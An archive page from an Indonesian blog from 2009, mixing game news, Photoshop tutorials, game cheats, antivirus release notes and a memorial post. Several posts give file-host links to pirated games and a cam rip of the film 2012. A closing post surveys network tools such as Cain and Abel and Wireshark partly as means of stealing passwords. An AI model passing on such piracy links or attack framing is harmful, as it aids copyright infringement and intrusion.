Tuesday, November 24, 2009

[Update]-Update 24 November 2009 - Map Baru

Sudah bosan dengan tempat bertarung yang itu-itu saja? Atau kamu sudah bosan bermain mode itu-itu saja di map favoritmu? Oke, sekarang Point Blank menghadirkan 2 map baru, untuk memenuhi kebutuhanmu akan tempat baru yang refreshing dan memacu adrenalin lebih tinggi lagi.

  1. Break Down
    Pada map ini kedua tim mempunyai objek yang harus dihancurkan. Tim yang lebih dahulu menghancurkan objek milik musuh akan memenangkan pertempuran ini. Saling menghancurkan objek milik musuh merupakan daya tarik dari map ini.
    Mode: Destruction Mission
  2. Storm Tube
    Kota ini memiliki subway yang sedang dibangun. Para imigran yang bekerja pada tempat ini sering mendapatkan diskriminasi dan perlakuan yang tidak layak dan berita ini kemudian tersebar luas. Free Rebels yang mendengar hal ini menjadi marah dan berniat meledakkan kereta bawah tanah ini...
    Mode: Deathmatch

Nah...udah gak sabar kan nyoba semua ini? Sabar yah, pertama kali, tunggu maintenancenya dulu, yang akan dilakukan tanggal 24 November 2009 jam 07:00 - 11:00 WIB. Maintenance kali ini selain untuk mengupdate kedua map tersebut, juga untuk melakukan perbaikan terhadap bug di map Downtown.




Read more...

Edit Dian sastro




Membuat Wallpaper Dian Sastro pake Efek Futuristik


Sebelumnya saya minta maaf kepada Mba Dian Sastro karena fotonya saya pinjem buat diedit.. hehehe.. gpp kan mba Dian ? kali aja Mba Dian Sastro lagi mampir disini.. hehehe.. Pede amat ya web ini dikunjungin Dian Sastrowardoyo..


Saya akan buat wallpaper Dian Sastro dengan efek futuristik.. hasilnya liat aja nanti deh ya.. di akhir acara.


Pertama buka dokumen baru, karena untuk wallpaper maka minimum ukurannya adalah 800×600 px dengan resolusi 300 pake 1024×768 px. Saya pake yang minim aja karena komputer saya lambat :D..


dian sastro 1


Warnai Background dengan warna Hitam.


Buka gambar Dian Sastro lalu seleksi.. karena warna background nya putih.. pake Magic Wand Tool ajah.. selebihnya pake polygonal lasso tool.


dian sastro 2


Drag foto yang udah diseleksi ke dokumen baru tadi.


dian sastro 2-1


Gunakan eraser tool untuk merapihkan bagian pinggir gambar yang mungkin kurang rapi. Klik eraser tool, klik kanan di layar pilih soft round.


dian sastro 3


dian sastro 4


Buat garis Path seperti gambar di bawah dengan Pen Tool


dian sastro 5


Klik Brush Tool ( atau tekan tombol B), klik kanan di layar, pilih brush size 3. ini untuk membuat garis sesuai Path tadi.


dian sastro 6


Buat Layer baru ( Layer > New > layer ), Klik Direct Selection Tool, klik kanan di garis path > Stroke path


dian sastro 7


Delete path . Posisi tool masih di Direct Selection tool, Klik kanan padi garis path > Delete Path.


Tekan CTRL + J untuk mengcopy layer garis path tadi sebanyak 4 kali..


Klik Move Tool, geser satu persatu layer hasil duplikat tadi ke kiri atau kanan, dengan menggunakan Panah (kiri/kanan) di Keyboard.


dian sastrowardoyo 8


Klik Layer paling atas, tekan CTRL + E untuk menggabungkan layer atas ke bawahnya, sebanyak 4 kali.


dian sastrowardoyo 9


Tekan CTRL + J lagi untuk menduplikat layer gabungan tadi (layer 2), Klik Edit > transform > flip horizontal.. untuk membalikan gambar di layer copy tadi. ke bawah atau atas.


dian sastrowardoyo 10


Klik layer paling atas.. Gabungkan lagi dengan menekan CTRL + E.


dian sastrowardoyo 11


Sekarang hapus bagian yang kurang penting di layer 2 dengan menggunakan eraser tool


dian sastrowardoyo 12


Buat layer baru di paling atas.. Warnai atas garis dengan aneka warna, sesuai selera..


dian sastrowardoyo 13


Ubah layer efek menjadi COLOR. ..


dian sastrowardoyo 14


dan perhatikan hasilnya, hapus bagian bawahnya dengan eraser tool, gunakan Soft Round supaya keliatan bergradasi.


dian sastrowardoyo 15


Sekarang Buka gambar RENDER PACK, gambar-gambar render pack tinggal cari aja di google image.. tulis kata kunci RENDER PACK , atau bisa download render pack yang dibawah


render pack


( Klik untuk memperbesar , kalo udah besar disayang pacar klik kanan save image as )


Setelah file render pack kebuka di photoshop, seleksi sebagian , lalu DRAG ke dokumen Foto editan tadi.. Atur-atur letak nya.. di rotate (puter), resize ( perkecil/perbesar), hapus pinggir-pinggir nya dengan Eraser tool ( Soft Round) dan yang paling penting, simpen di bawah layer foto.!


dian sastrowardoyo 17


Buat juga untuk bagian sisi yang laen dan bagian bawah.. untuk bagian bawah spesial berada di atas layer foto.


dian sastrowardoyo 118


Hasilnya kayak gini :


dian sastrowardoyo 19


Untuk membuat efek bening, buat layer baru, buat bentuk seperti dibawah dengan polygonal lasso tool,warnai dengan brush yang gede ( soft Round ) berwarna Putih dikit aja di bagian atas nya.


dian sastrowardoyo 20


Hapus bagian yang agak mengganggu dengan eraser tool (Soft Round ), Kecilkan Opacity nya.


dian sastrowardoyo 21


Dengan cara yang sama buat 2 lagi di atas nya


Hasil final nya:


Dian Sastrowardoyo Wallpaper

Selamat mencoba..







Artikel Membuat Wallpaper Dian Sastro pake Efek Futuristik ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Kenali dan Kunjungi Objek Wisata di Pandeglang, untuk mengetahui lebih jauh tentang Pandeglang sebagai Objek Wisata yang patut diperhitungkan karena keindahannya.




Read more...

Foto Luna Maya Terbakar!




Foto Luna Maya Terbakar!


Ini tutorial by request juga..


Karena banyak yang minta tutorial tentang efek kertas terbakar.. saya bikinin sekarang deh.. sekarang modelnya gak tanggung-tanggung.. Luna Maya ! hehehe.. Tutorial sebelumnya saya pake model Dian Sastro.. wah.. lama-lama Model di blog ini Artis papan atas semua nih :p.


Btw.. sebelumnya .. Maaf yaa mba Luna maya… saya pake foto nya.. :)


Saya dapet foto ini dari kapanlagi.com, karena gak mungkin saya motret Luna Maya secara langsung, wong dunia kita berbeda.. :)


Buka foto Luna Maya


Luna Maya

Duplikat layer dengan menekan CTRL + J


luna maya 2


Buat Background menjadi putih dengan menekan tombol CTRL+ Backspace di keyboard. ( settingan Background color musti putih )


luna maya 3


Klik 2x layer hasil duplikat tadi atau klik kanan > Blending Option


Kita setting Inner glow nya


luna maya 4


Klik Windows > Brushes .. Kita setting brush nya juga


luna maya 5


Hapus bagian foto yang kira-kira gak kepake.. silahkan berkreasi sendiri aja ya..


luna maya 6


Hasilnya akhirnya :


luna maya 7


Wah.. singkat ya.. hehehe..


Selamat mencoba .. !


Jangan lupa daftar jadi member yaa untuk dapet tutorial format PDF , plugin-plugin keren, Brush-brush ciamik dan Template PSD yang Mantep.. ada juga tutorial bikin kartun lho..


Ayo buruan Daftar Mumpung ada DISKON 50 % . Supaya dapet diskon, pas Daftar Masukan Kode Kupon : 5F1E7


Daftar Member Disini







Artikel Foto Luna Maya Terbakar! ini dipersembahkan oleh Tutorial Photoshop Gratis. Kunjungi Wallpaper, Font, Desktop Theme Gratis Pokoknya Serba Gratis. Baca Juga Kenali dan Kunjungi Objek Wisata di Pandeglang, untuk mengetahui lebih jauh tentang Pandeglang sebagai Objek Wisata yang patut diperhitungkan karena keindahannya.




Read more...

Sunday, November 22, 2009

Download Stronghold Extreme

Free Download Stronghold Extreme















langsung aja di unduh n maen....
Download:

Part 1
Part 2
Part 3
Part 4
Part 5
Part 6
Part 7
Part 8


Mbah Rapid:
http://rapidshare.com/files/221010612/shcedafr.part1.rar
http://rapidshare.com/files/221010572/shcedafr.part2.rar
http://rapidshare.com/files/221010524/shcedafr.part3.rar
http://rapidshare.com/files/221010591/shcedafr.part4.rar
http://rapidshare.com/files/221010539/shcedafr.part5.rar
http://rapidshare.com/files/221010543/shcedafr.part6.rar
http://rapidshare.com/files/221010493/shcedafr.part7.rar


Read more...


Free Download Game Stronghold Crusader













Download:

Part 1
Part 2
Part 3

Read more...

Thursday, November 19, 2009

Download Film 2012 full

2012

2012

Film 2012 adalah film tentang bencana besar yang akan terjadi pada tahun 2012. Film yang saat ini sedang tayang dibioskop seluruh dunia menceritakan tentang bagaimana bencana besar terjadi diseluruh belahan bumi. ide pembuatan cerita berasal dari ramalan suku maya yang menyatakan bahwa calendar akan berakhir pada tanggal 21-12-2012 yang kemudian di prediksikan oleh orang orang modern sebagai hari kiamat.

Film ini menyuguhkan Efek yang luar biasa, bahkan belum pernah terlihat di film manapun sebelumnya. Di dalamnya anda akandisuguhi bencana gunung meletus, Gempa bumi diatas 9,6 Ricter yang meruntuhkan gedung gedung di california dan stunami yang tingginya menyamai ketinggian pegunungan tertinggi didunia (seperti terlihat diposter), Pertanyaannya? Bagaimana usaha manusia menyelamatkan diri? MIrip cerita nabi nuh. Para pemimpin dunia bersepakat membuat kapal besar dan untuk bisa masuk kapal ini harus membayar 1 juta dollar per orang. Nah jadi hanya orang2 kaya yang akan selamat, gitu ceritanya sih?, sedangkan subplot dari film ini adalah seorang Ayah yang berusaha menyelamatkan anak anaknya serta(mantan) istrinya agar bisa masuk kedalam kapal penyelamat ini. Mereka menempuh perjalanan menggunakan mobil dilanjutkan dengan pesawat pribadi dimana disinilah adegan menegangkan penuh FX akan membuat anda terkesima (sekaligus takut, kalau anda mempercayai akan datangnya kiamat)

Dengan durasi hampir 150 menit (lebih dari 2 jam) anda akan puas melihat film ini. Walaupun ini cerita fiksi, namun semoga ada manfaat yang bisa diambil dimana orang orang yang menonton menjadi sadar, bahwa bumi rapuh dan kiamat PASTI akan datang dan tentunya kiamat yang sebenarnya jauh jauh lebih mengerikan jika dibanding dengan efek sebuah film , dan semoga kita makin mengingat sang pencipta dengan adanya film ini dan tidak terlena dengan dunia .

Director: Roland Emmerich
Cast: John Cusack, Thandie Newton, Amanda Peet, Danny Glover

File Format: AVI
Quality: D.CamRip
Video: 720×416 (1.73:1), 25 fps, XviD build 50 ~ 1301 kbps avg, 0.17 bit / pixel
Audio: 48 kHz, AC3 Dolby Digital, 2 / 0 (L, R) ch, ~ 256.00 kbps avg
Size: 700 MB

Download Film 2012 (update terbaru 19-11-09)

http://rapidshare.com/files/308685461/2012._2009_.TS.PROPER_XVID_-AX.part1.rar
http://rapidshare.com/files/308687421/2012._2009_.TS.PROPER_XVID_-AX.part2.rar
http://rapidshare.com/files/308683834/2012._2009_.TS.PROPER_XVID_-AX.part3.rar
http://rapidshare.com/files/308684649/2012._2009_.TS.PROPER_XVID_-AX.part4.rar
http://rapidshare.com/files/308684266/2012._2009_.TS.PROPER_XVID_-AX.part5.rar
http://rapidshare.com/files/308685346/2012._2009_.TS.PROPER_XVID_-AX.part6.rar
http://rapidshare.com/files/308684070/2012._2009_.TS.PROPER_XVID_-AX.part7.rar
http://rapidshare.com/files/308682525/2012._2009_.TS.PROPER_XVID_-AX.part8.rar

atau di link bawah ini

http://rapidshare.com/files/308556112/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part1.rar
http://rapidshare.com/files/308567800/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part2.rar
http://rapidshare.com/files/308553924/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part3.rar
http://rapidshare.com/files/308555849/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part4.rar
http://rapidshare.com/files/308553969/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part5.rar
http://rapidshare.com/files/308556138/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part6.rar
http://rapidshare.com/files/308556220/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part7.rar
http://rapidshare.com/files/308551330/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part8.rar

atau

http://www55.indowebster.com/0cea855ea57429bcbc017486ffb981b5.mkv dari indowebster (dari pengunjung blog ini)

atau

http://hotfile.com/dl/17860222/ff48da9/Odem2012HQ-FUSION_dl4all.com.part1.rar.html
http://hotfile.com/dl/17860223/25b6c29/Odem2012HQ-FUSION_dl4all.com.part2.rar.html
http://hotfile.com/dl/17860224/5166363/Odem2012HQ-FUSION_dl4all.com.part3.rar.html
http://hotfile.com/dl/17860225/a235726/Odem2012HQ-FUSION_dl4all.com.part4.rar.html

http://www.megaupload.com/?d=FN732IS3

Untuk Subtitle Indonesia klik di :

http://www.opensubtitles.org/en/subtitles/3592809/2012-id


Read more...

Friday, November 13, 2009

Cheats STRONGHOLD CRUSADER V1.1


saat di bagian menu utama (menu yang ada tulisan untuk mulai game,load game,option dan sebagainya) tekan [ Shift + Alt + A ] secara bersamaan. Setelah itu mulai permainan,dan selama permainan tekan tombol-tombol dibawah ini secara bersamaan untuk aktifin kode tertentu :

ALT + X ... Menambah popularitas 100 dan uang 1000
ALT + C ... Melingkari karakter dan membuka semua misi
ALT + K ... Menghancurkan markas musuh
ALT + Z ... Menghancurkan musuh yang dipilih
ALT + G ... Menghancurkan pertahanan utama
ALT + D ... Membuka debug menu
ALT + P ... Menambah Level karakter sebanyak 1 level
ALT + F ... Upgrades dan Purchases semuanya gratis
ALT + S ... Mengatur waktu / menghentikanya
ALT + Q ... Mengurangi waktu
ALT + Y ... Semua musuh dilayar menjadi aneh.

sekarang coba sekali lagi . Gunakan kode Shift + Alt + A dilayar menu utama pada saat kamu memulai game. Lalu jalankan permainan dan gunakan kode-kode diatas.

moga berhasil


Read more...

Thursday, November 12, 2009

Stronghold Crusader trick and tips

Various Cheats
At the Main Menu, press Shift + Alt + A to enable cheat mode. Now during gameplay, press any of the following:


Alt + C = All Missions
Alt + K = Free Building, No Resources Required
Alt + X = 100 Popularity and +100 Gold

Stronghold Crusader screenshot, author: Powell

Game tips, hints and secrets submitted by our visitors.
Submitted by: gunman
Hold Enemies Captive Inside Their Own Castles
Take a small building such as an Oxen Tether. Place 1 or 2 of them right outside the gatehouse(s) of your enemy's castle, but make sure their keep is enclosed first. Immediately put the Oxen Tethers to sleep. The ground troops will walk to the gatehouse to destroy them but they can't get through, so they just walk back to their spot. Your enemy's buildings outside of the castle will spontaneously crumble because the workers can't get back inside the castle. Also, the gatehouse(s) you blocked might spontaneously crumble after a while. Soon there will be no food and the peasants will leave the castle. The small army will be trapped inside their own walls awaiting your arrival. When your army is built up, you can just waltz over and wipe the whole castle off the map. (Note: Make sure there are no enemies outside of the castle, or else they will probably come and destroy your oxen tethers.

Submitted by: Stronghold Addict
On most games on Stronghold Crusader, it is easy to win. All you have to do is build a barracks, armory and a market. Spend all your gold on producing macemen. If you do this in the first 4 minutes of the game you can sent your macemen to your unready enemies and destroy them. Easy as pie!

Submitted by: Wild cat
If your enemy has a well-defended castle with two or more lines of walls, here's a strategy that might help you to defeat him:

1. You kill the archers on the first wall, usually they are not so many.
2. Get your archers (better crossbowmen) near the unguarded wall, but really close.
3. Now the enemy ranged units cant see yours, because they are hidden behind the walls. All you have to do is command your hidden archers to shoot at the enemy.

Note: Your archers aren't accurate at all because they can't see their target.
Good luck!

Submitted by: nick
If your tower is full of archers and you want more archers in the tower, this is what you can do. 1st take all the archers of the tower and put them on the ground. 2nd hire more archers and put them on the ground but away from the other group of archers. 3rd take one group of archers and put them on the tower. Then very quickly get the other group of archers and put them on the tower before the other group gets up there.

Submitted by: Vasko Kendev
If you want to be protected very well, make this:

1. Build a normal wall.
2. Build a second wall, but make a place between two walls.
3. Set a cage with dogs in the free place between the walls.

When enemy attack you and destroy the first wall you can let the dogs.

Submitted by: Bill
If you want to be really economical, because if you raise taxes to average people will leave, just make a mercenary post and make some horse-archers and then you can gallop to meet your enemy when they raid you and most adversaries send in short range men so generally you won't have to worry about them firing back. So get some horse-archers and then you can concentrate on economy and give the people food, a church and anything else you want to add (i.e. maypole, dancing bear, flags, communal gardens, gallows, apothecaries etc.) and then once you are on a stable 100 popularity, raise taxes to average make weapons, sell some, use others for men, an make macemen or whatever you want, plus some men from your mercenary post. Also, monks are good and you can get monks from a cathedral, they are good against the snake or the rat because they are good in brawls with spearmen.

Submitted by: bud
When fighting against any of the largest and most viscous Lords, the best way to keep them small is to buy as many archers from a mercenary post as you can at the start of the game, then send them out and keep them busy at the oxen tethers and quarries and mines sending regular reinforcements as you do, but keep an eye on them because the enemy will send out forces to kill them. Just pull your men back until the enemy stops chasing them, horse archers work better for this trick because you can put them on a long patrol from your castle to theirs and they will shoot as they go.

A nice way to start your economy is if you have oasis land to slap down three wheat farms and three bakeries. This will use up all available campfire men but if you put them to sleep will also increase the amount of men you have for defense measures. Don't put them to sleep too long or you will run out of food, three farms run for about 20-30 people if I remember right, but keep an eye on things anyway and it doesn't hurt to add farms and orchards when you can.

The first woodcutter you put down in the game is free but he won't cover very well so three woodcutters will be a nice start.

Submitted by: Aftin
If you have trouble with enemy archers a good tactic is to make at least 30 horse archers and command them to patrol in front of the enemy castle, this makes a hard moving target and you will take them out as you move.

Submitted by: ho
Building 3 orchards at the beginning of the game can be extremely useful as they are cheap and support a large population.

Submitted by: Nisde
By immediately placing a group of Woodmen Huts around an enemy base, then putting them to sleep, you will block the area and prevent him from building Barracks or a Mercenary Camp. It costs a lot of Wood, but it means they cannot make any troops and therefore very easy to defeat. Note: This does not work on the Pig. In the most difficult levels when the enemy comes at you very early, try to set up a trap. Build strong walls around your land except in one area. Leave an opening and have as many troops as possible covering that area. The enemies often ignore the undefended walls and go for your "weak spot" Instead, they walk in to a wall of Ballista, Archer, and crossbow fire; and a few Knights for good measure. Do not forget your Lord is also a superb fighter that also can be used.

Submitted by: Shaun
To have more than having just 24 peasants near your campfire, do this trick: have plenty of hovels (houses) and make at least 16-10 wells (the ones that's hold up to 3 people). Now when you need extra people for whatever reason (making units, having peasants faster than what they once were) you just need to put the wells to sleep and presto, extra peasants in the campsite.

Submitted by: Ryan
To get a high religion coverage, place chapels by your gatehouses. The villagers all have to pass through one to drop off their provisions at the granary/stockpile, and since priests stay in rough proximity to their chapel, you can get a very high religion coverage with not too much expense.

Submitted by: Desdichado
1. As soon as the game starts, reduce the speed, place a mercenary post, a market, two or three hovels and sell all the resources and produce swordsmen and assassins. Charge at your enemy who will be just starting to produce the army.
Note: This works only on few enemies and not all.

2. In case your enemy's defense is too good to approach, get 20 engineers near his castle (not too close) and build catapults. Throwing stones at a time, from ten or more catapults will produce unimaginable damage to the enemies.
Note: You need to stabilize your stone production before your attempt. Place 5 to 6 fire ballistas around the catapults for their safety.

3. Not all games require a fort around your house. If you're placed in one corner of the map, just two round towers with archers and engineers on top with a line of fire ballistas will almost prevent any kind of army from reaching the manor house.
Note: This way, you have more stones to use, and less stone buildings to lose.

Submitted by: Valo
The best thing you have to do in order to make enemies not to attack you is making 30 archers on horses and attacking all the time. In this way, the enemy can't develop and attack you. When you have enough money, you had better increase the number of your horses and leave them attacking the enemy. Then make some soldiers just to kill the king (tip: send the soldiers all together because the king is very strong and can kill someone alone in no time.)

Submitted by: Vio
Exploiting the blatantly stupid AI:

* Put woodcuter huts right next to the Snake's buildings. He will burn them down, along with his own castle.
* Combine the "weak spot" strategy with some pitch. Even when it's already burning, they will run right into it.
* Make towers unusable without fully destroying them, and they will never be replaced.
* Build your gatehouse in a way that your keep is not enclosed *until* the drawbridge goes up. The enemy will send no siege machines, and then leave his confused knights standing at the moat.
* Do not destroy mines/orchards he builds next to your base. Instead, station an archer there to shoot his ever returning peasants.


Submitted by: Messenger
I have been playing the game for more than a year now, and it still gives me great challenge and pleasure. When I upgrade my platform I will buy 'Extreme'. I would also like to thank all of the players who have freely given their hints. May I add one I learned from another site? Place two or more workers into a single building or farm to garner greater production without having to buy a separate building to house each. Select the bread farm, click pause, put it to sleep, then wake it up, then unpause. Thanks, and good luck.

Submitted by: Adm. Awesome
Is the enemies base well defended by fire ballistas? You can use this against them! Find an open spot inside their fortress, build an Ox Tether there. It will take awhile, but eventually they will set it on fire, which will spread through-out their fortress. They will probably put their buildings out, but yours will continue to burn. If you can, find another open space and build another Ox Tether, hopefully the first one will light the second one on fire too. If done properly, you can keep flames spread through-out their fortress for the whole game, this will kill their workers and any soldiers who try to travel on the ground. Plus various buildings and maybe their grainery. After all this is done, let the fire go out and all they will have left is their towers with some archers in them, easy enough to get past.

Submitted by: Blake thoughts
To enable the cheats, go to the main menu, hold [Ctrl], and type "triblade2002" without the quotes (and while still holding Ctrl) (yes, I know that sounds like a fake activator, it isn't amazingly). After the cheats are enabled (you will not receive any notification if they are), press the following keys during a game to activate certain cheats:
[Alt] + X: Raises popularity to 100 and gives 1000 gold. Can be held down for massive gold.
[Alt] + C: Unlocks all missions in the game
[Alt] + K: Makes it so when you build buildings, they do not use the resources they normally need. Be careful when activating this cheat, and try to hold alt and tap the K key once and very quickly. Holding down the K key for even a short time can cycle between activating and deactivating the cheat.
Press [Alt] + K once more to deactivate the cheat

Read more...

[Hot News] Smadav 2009 Rev. 7.3 dirilis !!!

Pada Rev. 7 kali ini Smadav telah disempurnakan untuk menjadi jauh lebih cepat dan lebih ringan dalam
mendeteksi dan mengamankan komputer Anda dari ancaman virus di Indonesia.

Fitur-fitur baru yang ditambahkan seperti Smad-Turbo (Scanning 10x lebih cepat), Smad-Theme (Mengganti warna tema), Smad-Ray (Otomatis scan flashdisk sangat cepat). Ini semua membuat Smadav menjadi salah satu dari antivirus tercepat dan paling ringan sedunia, sehingga Smadav tetap dapat digunakan pada komputer-komputer dengan spesifikasi rendah sekalipun.

Pada Rev. 7 ini Smadav juga menambahkan database pengenalan virus-virus baru yang banyak menyebar di Indonesia. Perkembangan virus lokal saat ini semakin berkurang dan tidak seaktif bulan-bulan sebelumnya. Mungkin ini karena Smadav yang sudah banyak digunakan pengguna-pengguna komputer di Indonesia. Jadi, virus lokal di Indonesia sekarang tinggal sedikit lagi untuk menuju kepunahan.

Selain itu juga banyak perbaikan yang dilakukan pada tampilan Smadav secara keseluruhan agar Smadav semakin mudah dan praktis digunakan. Berikut ini adalah penjelasan lengkap fitur-fitur baru di Smadav 2009 Rev 7 :

Smad-Turbo (Scanning 10x lebih cepat)
Smad-Turbo adalah salah satu fitur scanning antivirus tercepat di dunia yang hanya dimiliki Smadav Pro. Jika dengan Smadav Free Anda memerlukan waktu 20 menit untuk scanning seluruh isi file komputer, dengan menggunakan fitur ini Anda hanya perlu waktu kira-kira 1-2 menit untuk melakukan scanning seluruh isi file di komputer Anda. Jadi, Scanning Smadav Pro 10x lebih cepat daripada Smadav Free dengan menggunakan Smad-Turbo ini.

Smad-Theme (Mengganti warna tema)
Smadav Pro mempunyai kemampuan untuk mengganti warna tema Smadav yang awalnya berwarna hijau menjadi warna pilihan Anda. Di bagian setting warna tema Anda dapat menemukan warna pilihan Anda sendiri untuk menjadi tema Smadav. Setelah Anda ganti tema warnanya, warna semua tampilan Smadav akan otomatis berubah menjadi warna pilihan Anda.

Smad-Ray (Otomatis scan flashdisk sangat cepat)

Setelah flash-disk dicolok di komputer, Smadav akan langsung memunculkan hasil scan dalam bentuk notifikasi apakah flashdisk Anda terinfeksi virus atau tidak, prosesnya sangat cepat hanya sekitar 1-5 detik sehingga Anda tidak perlu lagi berlama-lama menunggu hasil scanning flashdisk yang baru dicolok.
Perbaikan tampilan Smadav
Tampilan Smadav yang lama dianggap pengguna masih terlalu besar dan tidak cocok untuk sebagian pengguna di Mini Laptop/Netbook. Pada Rev. 7 kali ini tampilan Smadav sudah berukuran lebih kecil dan Smadav sudah bisa menyesuaikan ukurannya menjadi mini ketika dipakai di Netbook.

Perbandingan Smadav Free & Pro
Pada bagian tab donation sekarang sudah ditambahkan tabel perbandingan Smadav Free & Pro. Anda dapat mengklik baris-baris pada tabel ini untuk mengetahui kelebihan-kelebihan Smadav Pro dibandingkan Smadav Free.

Penyempurnaan Smadav 2009 Rev. 7.1

* Penambahan database virus baru
* AutoUpdate untuk Smadav Pro di Vista & Win7
* Perbaikan Bug Scan with Smadav
* Loading Quarantine lebih cepat
* Mengirim statistik ke server Smadav
* Bug pada pembersihan virus fusion

Penyempurnaan Smadav 2009 Rev. 7.2

* Penambahan fitur Exception di Tools 1-Virus By-User
* Penambahan banyak database virus baru
* Perbaikan koneksi program Smadav dengan server Smadav.net
* Perbaikan proteksi registration key anti pembajakan

Penyempurnaan Smadav 2009 Rev. 7.3

* Pembersihan tuntas untuk beberapa virus baru
* Penambahan kecerdasan (heuristic) pendeteksi virus Smadav
* Perbaikan metode update Smadav
* Penggantian server utama Smadav.net
* Perbaikan salah deteksi pada beberapa program

Download from SMADAV site:
Smadav 2009 Rev 7.3

Sumber: Smadav.net

Read more...

Tuesday, November 10, 2009

1 Lagi chater mig33 meninggal dunia

viper_99 id di mig33 nya... beliau adalah chater mig33 dari tanjung termasuk lama juga knal di mig33.. orang nya gak pernah macem2 kaya plood,multy,abusing etc...
pokok nya terkenal baik...
kronologis: sepulang dari kerja viper_99 mandi dan ganti baju,kemudian keluar hendak mengganti ban motor ke bengkel... seperti biasa dan udah jd kebiasaan dimanapun berada asal baterai dan pulsa terisi pasti online mig33...jd pada saat itu seperti biasa tangan kanan memegang gas motor dan tangan kiri memegang hp ( online ) pada saat yang bersamaan melintas sebuah sepeda motor yang membawa besi... karena kaget viper_99 kemudian menghindar namun oleng ke sebelah kanan,dari arah berlawanan melintas mobil kijang dan langsung bertabrakan... viper_99 di bawa ke rumah sakit tanjung dan di rujuk ke RS Bhayangkara Banjarmasin... namun setelah beberapa operasi viper_99 pun meninggal dunia....selamat jalan kawan..... semoga arwah mu di terima di sisi NYA.... saran untuk mig33 team : agar menayangkan announcement untuk mengingatkan agar para chater lebih berhati-hati lagi dalam keadaan online dimana saja. dan untuk keselamatan bersama... chat dengan aman..


English version:
mig33 id viper_99 in his ... he is from the promontory chater mig33 also includes long known in mig33 .. its people like never 2 rich plood, Multy, etc ... main abusing his well-known ... chronological order: coming home from work viper_99 shower and change clothes, then went out to change the tire bike to the shop ... as always and everywhere a habit jd've been home and pulse charged battery must be online mig33 ... so at the time as usual right hand holding a gas motor and the left hand holding the hp (online) at the same time passing a motorcycle that brings the iron. .. viper_99 shock away but then swerved to the right, from the opposite direction across the car and immediately deer collided ... viper_99 taken to the hospital in capes and Bhayangkara refer to Banjarmasin ... but after several operations had died viper_99 .... bye ..... comrade I hope your spirit in the side NYA received .... (suggestions for mig33 team: to publish announcement to remind that the chater more cautious again in from anywhere.)
and to safety with ... chat with safe .. i hope mig33 team see and comment in this blog...

Read more...

Sunday, November 8, 2009

Software hacking populer digunakan

Setiap tentara memiliki senjata khusus untuk berperang. Begitu juga seorang hacker yang wajib memiliki beragam tools untuk membantu penyerangan. Berbagai tools/software tersebut memang didesain khusus dengan tujuan yang khusus pula. Masing-masing memiliki kelebihan dan kekuranganya.

Ada yang hanya digunakan sebagai pengintai, penganalisis, penjebak, penyerang, pengumpan atau sebagai pelindung. Dari berbagai forum saya mendapatkan 7 tools yang umumnya digunakan oleh sebagai hacker, yaitu:

1. nMap



Mungkin sebagian orang tidak aneh lagi mendengar nama besar nMap. Software ini cukup lama wara-wiri di dunia bawah tanah (red: hacking). nMap atau Nerworking Map banyak digunakan untuk untuk eksplorasi dan analisis kemananan sebuah jaringan. Tools ini didesain mengetahui port-port yang terbuka atau tidak terfilter dengan baik.
Keunggulan nMap sudah tidak diragukan lagi. Bahkan para administrator jaringan menggunakan software ini untuk mengetahui kemananan jaringannya sendiri. Sesuai namanya, nMap (networking map) akan memetakan berbagai informasi penting dalam jaringan, misalnya informasi host, service, sistem operasi, tipe paket yang dikirim, firewall, dan lain-lain.
nMap dapat dijalankan pada berbagai sistem operasi. Namun yang lebih penting software ini gratis digunakan. Silakan kunjungi situs resminya disini atau download programnya disini.

2. Nessus


Nessus adalah software terpopuler yang banyak digunakan organisasi keamanan jaringan dunia. Sekarang ini Nessus telah digunakan di lebih dari 75.000 organisasi dunia. Tools ini dimanfaatkan untuk mengetahui kelemahan/celah keamanan sebuah jaringan. Meskipun source kode nessus tidak dibagi lagi, namun program ini masih bebas digunakan secara gratis. Sifatnya yang dengan kamampuanya yang handal ini yang membuat Nessus banyak diminati. Hitung-hitung memperoleh keuntungan dengan mengurangi anggaran perusahaan membeli software analisis keamanan. Silakan kunjungi situs resminya disini dan Download programnya disini.

3. Wireshark


Wireshark adalah tools Network Protocol Analyser. Software ini digunakan untuk menganalisa paket yang melalui protokol jaringan. Wireshrark banyak digunakan sebagai sniffer yang dipakai untuk mengambil data yang keluar masuk dalam lalu-lintas jaringan. Data-data penting seperti username dan password adalah incaran target utama dari tools ini. Menarik bukan?
Wireshark dapat berjalan di sistem operasi windows maupun linux. Namun kebanyakan lebih banyak dipakai oleh linux user karena lebih mudah dikonfigurasinya. Silakan kunjungi situs resminya disini dan download softwarenya disini.

4. Cain and Abel


Siapa yang tidak kenal dengan tools yang satu ini. Kemampuanya dalam pencurian username dan password di jaringan membuat software ini menjadi barang wajib yang terinstal di komputer seorang hacker.
Berbagai kelebihan Cain and Abel antara lain: Microsoft recovery password, cracking encrypted password, recording voip communication, decoding scrambled passwords, revealing password boxes, uncovering cached passwords dan analyzing routing protocols.
Meskipun tools ini hanya berjalan di sistem operasi windows, namun dengan segala kelebihanya anda bisa mencoba tools ini. Silakan kunjingi situs resminya disini dan download softwarenya.

5. Kismet


Kismet banyak digunakan sebagai wireless detector, sniffer, data capture dan instrusion detection system. Kismet dapat bekerja pada semua jenis kartu wireless yang telah didukung oleh raw monitoring (rfmon) mode. Kismet bekerja pada semua jaringan wireless 802.11b, 802.11a, dan 802.11g. Silakan kunjungi situs resminya disini atau download programnya disini.

6. Netstumbler


Tools ini tidak didesain untuk windows, namun masih tetap bisa digunakan di sistem operasi ini, meskipun berbagai fitur dan ketangguhanya lebih optimal jika terpasang di sistem operasi linux. Sama seperti Kismet, Netstumbler banyak digunakan sebagai Wireless network detection, snifffer, capture. Dengan tampilan dan menu yang mudah dipahami, Netstumbler banyak digunakan sebagai tools untuk war driving. Silakang kunjungi situs resminya disini dan download programnya.

7. Superscan
